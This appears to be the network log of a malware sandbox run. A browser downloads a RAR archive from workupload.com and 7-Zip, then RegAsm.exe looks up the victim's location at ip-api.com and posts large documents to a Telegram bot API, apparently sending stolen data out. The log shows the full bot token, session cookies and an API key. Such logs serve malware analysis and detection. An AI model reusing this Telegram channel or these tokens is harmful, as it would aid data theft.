                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "c440-60e5f59ac648c"
                                            Accept-Ranges: bytes
                                            Content-Length: 50240
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-700.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-700.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "c414-60e5f59ac648c"
                                            Accept-Ranges: bytes
                                            Content-Length: 50196
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/favicon/favicon.ico
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /favicon/favicon.ico HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "3aee-60e5f59ac54ec"
                                            Accept-Ranges: bytes
                                            Content-Length: 15086
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: image/vnd.microsoft.icon
                                          • flag-de
                                            GET
                                            https://workupload.com/start/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /start/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:08 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 2608
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/qr/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /qr/file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/start/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:08 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: image/png
                                          • flag-de
                                            GET
                                            https://workupload.com/favicon/manifest.json
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /favicon/manifest.json HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: manifest
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "145-60e5f59ac54ec-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 186
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/json
                                          • flag-de
                                            GET
                                            https://workupload.com/api/file/getDownloadServer/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /api/file/getDownloadServer/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            X-Requested-With: XMLHttpRequest
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/start/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:08 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 101
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/json
                                          • flag-de
                                            GET
                                            https://f81.workupload.com/download/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            94.130.130.53:443
                                            Request
                                            GET /download/fkp8vSaWfcU HTTP/1.1
                                            Host: f81.workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-Dest: document
                                            Referer: https://workupload.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:10 GMT
                                            Server: Apache
                                            Access-Control-Allow-Origin: https://workupload.com
                                            Access-Control-Allow-Headers: Range
                                            Access-Control-Expose-Headers: Accept-Ranges, Content-Encoding, Content-Length, Content-Range
                                            Content-Description: File Transfer
                                            Content-Disposition: attachment; filename="alright prynce v2 fr.rar"
                                            Expires: 0
                                            Cache-Control: must-revalidate
                                            Pragma: public
                                            Content-Length: 138877
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/octet-stream
                                          • flag-fr
                                            POST
                                            https://consent.google.com/save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true
                                            chrome.exe
                                            Remote address:
                                            142.250.179.78:443
                                            Request
                                            POST /save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true HTTP/2.0
                                            host: consent.google.com
                                            content-length: 0
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            accept: */*
                                            origin: https://www.google.com
                                            x-client-data: CODxygE=
                                            sec-fetch-site: same-site
                                            sec-fetch-mode: cors
                                            sec-fetch-dest: empty
                                            referer: https://www.google.com/
                                            accept-encoding: gzip, deflate, br
                                            accept-language: en-US,en;q=0.9
                                            cookie: AEC=AQTF6HxUxouQBcjizhCE07uA3STH-2UtXdvRD1m6rXndR4WdbXra_jt2v60
                                            cookie: __Secure-ENID=19.SE=R99nsubRQNQbGnF0LIjkD4AXJ9PJSALD9Xb_URHgy_EsEKH9vdjGv3sl0QfJENuHPLSi-Y97rXWS-jKdUhb4mycz34myWXY-BNlx9Aw-l5JSp-4UYB9nEnAgDt7VYIErFJBwTWFB_wKPAzdsUj5yua6G_dFBVHXqbRZaZjOqXgmj6CS7fZA
                                            cookie: SOCS=CAISHAgCEhJnd3NfMjAyNDA1MTMtMF9SQzMaAmVuIAEaBgiAmZWyBg
                                          • flag-fr
                                            GET
                                            https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto
                                            chrome.exe
                                            Remote address:
                                            216.58.215.42:443
                                            Request
                                            GET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto HTTP/2.0
                                            host: content-autofill.googleapis.com
                                            x-goog-encode-response-if-executable: base64
                                            x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                            x-client-data: CODxygE=
                                            sec-fetch-site: none
                                            sec-fetch-mode: no-cors
                                            sec-fetch-dest: empty
                                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            accept-encoding: gzip, deflate, br
                                            accept-language: en-US,en;q=0.9
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/7ziplogo.png
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /7ziplogo.png HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: image/png
                                            Content-Length: 1417
                                            Last-Modified: Tue, 27 Sep 2022 13:14:27 GMT
                                            Connection: keep-alive
                                            ETag: "6332f733-589"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET / HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Referer: https://www.google.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: text/html
                                            Last-Modified: Wed, 15 May 2024 12:45:38 GMT
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            ETag: W/"6644ae72-1c2c"
                                            Content-Encoding: gzip
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/style.css
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /style.css HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: text/css
                                            Content-Length: 1005
                                            Last-Modified: Wed, 08 May 2024 09:31:33 GMT
                                            Connection: keep-alive
                                            ETag: "663b4675-3ed"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/favicon.ico
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /favicon.ico HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: image/x-icon
                                            Content-Length: 318
                                            Last-Modified: Tue, 27 Sep 2022 13:14:27 GMT
                                            Connection: keep-alive
                                            ETag: "6332f733-13e"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/a/7z2405-x64.exe
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /a/7z2405-x64.exe HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:24 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 1619461
                                            Last-Modified: Wed, 15 May 2024 10:31:38 GMT
                                            Connection: keep-alive
                                            ETag: "66448f0a-18b605"
                                            Accept-Ranges: bytes
                                          • flag-us
                                            GET
                                            http://ip-api.com/json/?fields=11827
                                            RegAsm.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json/?fields=11827 HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:58:33 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 183
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 5
                                            X-Rl: 40
                                          • flag-us
                                            GET
                                            http://ip-api.com/json/?fields=11827
                                            RegAsm.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json/?fields=11827 HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:58:35 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 183
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 3
                                            X-Rl: 39
                                          • flag-us
                                            GET
                                            http://ip-api.com/json/?fields=11827
                                            RegAsm.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json/?fields=11827 HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:58:38 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 183
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 0
                                            X-Rl: 38
                                          • flag-nl
                                            POST
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            RegAsm.exe
                                            Remote address:
                                            149.154.167.220:443
                                            Request
                                            POST /bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----------------------------8dc75759e709b69
                                            Host: api.telegram.org
                                            Content-Length: 428977
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Thu, 16 May 2024 06:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 919
                                            Connection: keep-alive
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          • flag-nl
                                            POST
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            RegAsm.exe
                                            Remote address:
                                            149.154.167.220:443
                                            Request
                                            POST /bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----------------------------8dc75759e6e3965
                                            Host: api.telegram.org
                                            Content-Length: 428929
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            Response
